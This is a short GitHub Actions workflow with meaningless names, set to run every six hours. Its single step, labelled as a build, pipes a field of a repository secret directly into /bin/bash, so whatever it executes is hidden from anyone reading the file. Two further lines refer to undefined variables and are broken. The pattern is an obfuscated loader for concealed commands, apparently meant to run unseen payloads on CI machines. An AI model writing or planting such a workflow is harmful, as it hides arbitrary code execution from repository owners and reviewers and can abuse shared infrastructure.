name: chentihaoda

on:
  workflow_dispatch:
  schedule:
    - cron: '17 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chentihaoda
        env:
          zikls1333: ${{ secrets.zikls1333 }}
        run: |
          echo $zikls1333 | jq -r .rlh77 | /bin/bash
          echo $ab3001 | jq -r .xcl6 | /bin/bash
          echo $lr7245 | jq -r .ga219 | /bin/bash

